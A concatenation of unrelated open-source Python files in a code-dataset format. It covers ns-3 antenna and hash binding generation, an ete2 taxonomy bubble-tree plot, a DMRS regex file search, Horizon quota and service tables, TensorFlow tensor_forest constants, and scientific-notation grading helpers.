def register_Ns3CosineAntennaModel_methods(root_module, cls):
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel::CosineAntennaModel() [constructor]
cls.add_constructor([])
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel::CosineAntennaModel(ns3::CosineAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CosineAntennaModel const &', 'arg0')])
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetBeamwidth() const [member function]
cls.add_method('GetBeamwidth',
'double',
[],
is_const=True)
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## cosine-antenna-model.h (module 'antenna'): double ns3::CosineAntennaModel::GetOrientation() const [member function]
cls.add_method('GetOrientation',
'double',
[],
is_const=True)
## cosine-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::CosineAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## cosine-antenna-model.h (module 'antenna'): void ns3::CosineAntennaModel::SetBeamwidth(double beamwidthDegrees) [member function]
cls.add_method('SetBeamwidth',
'void',
[param('double', 'beamwidthDegrees')])
## cosine-antenna-model.h (module 'antenna'): void ns3::CosineAntennaModel::SetOrientation(double orientationDegrees) [member function]
cls.add_method('SetOrientation',
'void',
[param('double', 'orientationDegrees')])
return
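# Sketch of driving the cosine model through these bindings (assumes the
# compiled ns.antenna module; per the signatures above, the setters take
# degrees while Angles carries radians):
#
#   m = ns.antenna.CosineAntennaModel()
#   m.SetBeamwidth(60.0)
#   m.SetOrientation(0.0)
#   gain_db = m.GetGainDb(ns.antenna.Angles(0.0, 1.57))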
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3IsotropicAntennaModel_methods(root_module, cls):
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel::IsotropicAntennaModel(ns3::IsotropicAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IsotropicAntennaModel const &', 'arg0')])
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel::IsotropicAntennaModel() [constructor]
cls.add_constructor([])
## isotropic-antenna-model.h (module 'antenna'): double ns3::IsotropicAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## isotropic-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::IsotropicAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3ParabolicAntennaModel_methods(root_module, cls):
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel::ParabolicAntennaModel() [constructor]
cls.add_constructor([])
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel::ParabolicAntennaModel(ns3::ParabolicAntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParabolicAntennaModel const &', 'arg0')])
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetBeamwidth() const [member function]
cls.add_method('GetBeamwidth',
'double',
[],
is_const=True)
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_virtual=True)
## parabolic-antenna-model.h (module 'antenna'): double ns3::ParabolicAntennaModel::GetOrientation() const [member function]
cls.add_method('GetOrientation',
'double',
[],
is_const=True)
## parabolic-antenna-model.h (module 'antenna'): static ns3::TypeId ns3::ParabolicAntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## parabolic-antenna-model.h (module 'antenna'): void ns3::ParabolicAntennaModel::SetBeamwidth(double beamwidthDegrees) [member function]
cls.add_method('SetBeamwidth',
'void',
[param('double', 'beamwidthDegrees')])
## parabolic-antenna-model.h (module 'antenna'): void ns3::ParabolicAntennaModel::SetOrientation(double orientationDegrees) [member function]
cls.add_method('SetOrientation',
'void',
[param('double', 'orientationDegrees')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_Ns3HashImplementation_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor]
cls.add_constructor([])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_pure_virtual=True, is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function]
cls.add_method('clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor]
cls.add_constructor([])
## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor]
cls.add_constructor([])
## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_functions(root_module):
module = root_module
## angles.h (module 'antenna'): extern double ns3::DegreesToRadians(double degrees) [free function]
module.add_function('DegreesToRadians',
'double',
[param('double', 'degrees')])
## angles.h (module 'antenna'): extern double ns3::RadiansToDegrees(double radians) [free function]
module.add_function('RadiansToDegrees',
'double',
[param('double', 'radians')])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_Hash(module.get_submodule('Hash'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_Hash(module, root_module):
register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module)
return
def register_functions_ns3_Hash_Function(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
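# Usage sketch: main() streams the generated binding code to stdout via
# FileCodeSink(sys.stdout), so a typical invocation is simply
# (the script and output names here are hypothetical):
#   python modulegen.py > bindings.cc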
| gpl-2.0 |
sanja7s/SR_Twitter | src_taxonomy/bubble_tree_map.py | 1 | 3686 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
		# Add node name to leaf nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
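# A minimal usage sketch for Tree7s/Node7s (labels and scores are made up):
#   t = Tree7s("root")
#   t.find_root().add_child("movies", 0.72, 1)
#   t.find_root().add_child("cats", 0.3, 1)
#   print t.find_root().create_newick() + ";"
# Level-0 roots serialize with a trailing dot, so this prints:
#   (movies:0.72,cats:0.3)root.;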
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | mit |
nmndeep/Multi_lingual-tools | dmrs_chk.py | 1 | 5743 | import os
import re
def ff():
path='path_to_ace/ace-0.9.24/output'
srr=r'_human_dmrs.txt'
ans_fil=[]
#get user input for checking in regex.
print("1- check for lemma relations\n2-check for gpred-x\n3-check for gpred-e\n4-check for realpred-x\n5-check for realpred-e")
	que = int(raw_input())
	# for lemma relation check
	if que == 1:
print "Enter one number from the following:"
print"1.lemma-lemma:R\n 2.feat-lemma:R\n3.feat-feat:R\n4.lemma-feat:R"
		inp_1 = int(raw_input())
		if inp_1 == 1:
print"Enter the two lemma's whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'\"%s\"\s+to=\"\d+"\s+\"%s\"><rargname>' %(lem_1,lem_2)
		elif inp_1 == 2:
print"Enter the feat and lemma whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'%s\s+to=\"\d+"\s+\"%s\"><rargname>' %(lem_1,lem_2)
		elif inp_1 == 3:
print"Enter the two feat's whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'%s\s+to=\"\d+"\s+%s><rargname>' %(lem_1,lem_2)
		elif inp_1 == 4:
print"Enter the lemma and feat whose relation to be checked:"
lem_1=raw_input()
lem_2=raw_input()
reg= r'\"%s\"\s+to=\"\d+"\s+%s><rargname>' %(lem_1,lem_2)
# for gpred-x checking.
	elif que == 2:
print "enter the feature whose value is to be checked:"
lem_1=raw_input()
print "Cvarsort :x"
print"num:"
lem_2=raw_input()
print"pers:"
		lem_3 = int(raw_input())
print"pt:"
lem_4=raw_input()
reg=r'<gpred>%s</gpred><sortinfo\s+cvarsort=\"x\"\s+num=\"%s\"\s+pers=\"%u\"\s+pt=\"%s\"' %(lem_1,lem_2,lem_3,lem_4)
# for gpred-e checking.
	elif que == 3:
print "enter the feature whose value is to be checked:"
lem_1=raw_input()
print "Cvarsort :e"
print"mood:"
lem_2=raw_input()
print"perf:"
lem_3=raw_input()
print"prog:"
lem_4=raw_input()
print"sf:"
lem_5=raw_input()
print"tense:"
lem_6=raw_input()
reg=r'<gpred>%s</gpred><sortinfo\s+cvarsort=\"e\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6)
# for realpred-x checking
	elif que == 4:
print "Cvarsort :x"
print "Enter the lemma whose value is to be checked:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"sense:"
lem_3=raw_input()
print"num:"
lem_5=raw_input()
print"pers:"
		lem_6 = int(raw_input())
if lem_3.isdigit():
lem_3=int(lem_3)
			reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%u\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+ind=\"[+-]\"\s+num=\"%s\"\s+pers=\"%u\"' %(lem_1,lem_2,lem_3,lem_5,lem_6)
else:
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+num=\"%s\"\s+pers=\"%u\"' %(lem_1,lem_2,lem_3,lem_5,lem_6)
# for realpred-e checking
	elif que == 5:
print "Cvarsort :e"
print"Check for lemma :\n1- With sense,\n2-without sense"
		inp = int(raw_input())
		if inp == 1:
print "Enter the lemma whose value is to be checked:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"sense:"
lem_3=raw_input()
print"mood:"
lem_4=raw_input()
print"perf:"
lem_5=raw_input()
print"prog:"
lem_6=raw_input()
print"sf:"
lem_7=raw_input()
print"tense:"
lem_8=raw_input()
if lem_3.isdigit():
lem_3=int(lem_3)
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%u\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7,lem_8)
else:
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7,lem_8)
		elif inp == 2:
print "lemma:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"mood:"
lem_3=raw_input()
print"perf:"
lem_4=raw_input()
print"prog:"
lem_5=raw_input()
print"sf:"
lem_6=raw_input()
print"tense:"
lem_7=raw_input()
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7)
#general search/match space for all cases.
for filename in sorted(os.listdir(path)):
matches = re.search(srr,filename)
if matches:
			#change directory to the dmrs files directory.
os.chdir('/home/naman/ace-0.9.24/output')
fil=open(filename,"r")
test_str=fil.read()
#check for match in the current dmrs file
matches = re.search(reg,test_str,re.IGNORECASE)
if matches:
ans_fil.append(fil.name)
			fil.close()
for a in ans_fil:
print a
if not ans_fil:
print "No DMRS FILE WITH DESIRED CHARACTERS."
ff()
| mit |
DPaaS-Raksha/horizon | openstack_dashboard/dashboards/admin/info/tables.py | 9 | 2161 | import logging
from django import template
from django.utils.translation import ugettext_lazy as _
from horizon import tables
LOG = logging.getLogger(__name__)
class QuotaFilterAction(tables.FilterAction):
def filter(self, table, tenants, filter_string):
q = filter_string.lower()
def comp(tenant):
if q in tenant.name.lower():
return True
return False
return filter(comp, tenants)
def get_quota_name(quota):
return quota.name.replace("_", " ").title()
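# Example: a quota whose name is "injected_files" is displayed as
# "Injected Files".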
class QuotasTable(tables.DataTable):
name = tables.Column(get_quota_name, verbose_name=_('Quota Name'))
limit = tables.Column("limit", verbose_name=_('Limit'))
def get_object_id(self, obj):
return obj.name
class Meta:
name = "quotas"
verbose_name = _("Quotas")
table_actions = (QuotaFilterAction,)
multi_select = False
class ServiceFilterAction(tables.FilterAction):
def filter(self, table, services, filter_string):
q = filter_string.lower()
def comp(service):
if q in service.type.lower():
return True
return False
return filter(comp, services)
def get_stats(service):
return template.loader.render_to_string('admin/services/_stats.html',
{'service': service})
def get_enabled(service, reverse=False):
options = ["Enabled", "Disabled"]
if reverse:
options.reverse()
return options[0] if not service.disabled else options[1]
class ServicesTable(tables.DataTable):
id = tables.Column('id', verbose_name=_('Id'), hidden=True)
name = tables.Column("name", verbose_name=_('Name'))
service_type = tables.Column('__unicode__', verbose_name=_('Service'))
host = tables.Column('host', verbose_name=_('Host'))
enabled = tables.Column(get_enabled,
verbose_name=_('Enabled'),
status=True)
class Meta:
name = "services"
verbose_name = _("Services")
table_actions = (ServiceFilterAction,)
multi_select = False
status_columns = ["enabled"]
| apache-2.0 |
cg31/tensorflow | tensorflow/contrib/tensor_forest/python/constants.py | 30 | 1062 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Constants used by tensorforest. Some of these map to values in C++ ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# If tree[i][0] equals this value, then i is a leaf node.
LEAF_NODE = -1
# Data column types for indicating categorical or other non-float values.
DATA_FLOAT = 0
DATA_CATEGORICAL = 1
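# Sketch of intended use (the nested-list 'tree' layout is assumed from the
# comment above, not defined in this module):
#   if tree[i][0] == LEAF_NODE:
#       pass  # node i is a leaf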
| apache-2.0 |
dpeters19/webassign2 | science_utils.py | 1 | 2996 | import re
def is_hyper_scientific(number):
""" Determines if an answer is hyper-scientific
Args:
number (String)
Returns:
bool: True if is hyper-scientific, False otherwise
Example:
>>> is_hyper_scientific("1.00e2")
True
>>> is_hyper_scientific("100")
False
>>> is_hyper_scientific("1.234e5")
False
"""
pattern = r"\d\.\d{2}e\d{1,}"
if re.search(pattern, number) is not None:
if number[0] != "0": # First number should never be zero
return True
return False
def convert_to_scientific_notation(number):
""" Converts a number to scientific notation
Args:
number (float)
Returns:
String
Example:
>>> convert_to_scientific_notation(5)
'5.00e0'
>>> convert_to_scientific_notation(10)
'1.00e1'
>>> convert_to_scientific_notation(-100)
'-1.00e2'
>>> convert_to_scientific_notation(0.01)
'1.00e-2'
"""
number = "%.2e" % number
if "+" in number:
positive = True
number, exponent = number.split("+")
else:
positive = False
number, exponent = number.split("-")
exponent = str(int(exponent)) # Removes leading zeros
if positive:
return number + exponent
else:
return number + "-" + exponent
def is_acceptable_answer(correct_answer, response):
""" Calculates if an answer is an acceptable distance from the correct answer
Args:
correct_answer (float)
response (String)
Returns:
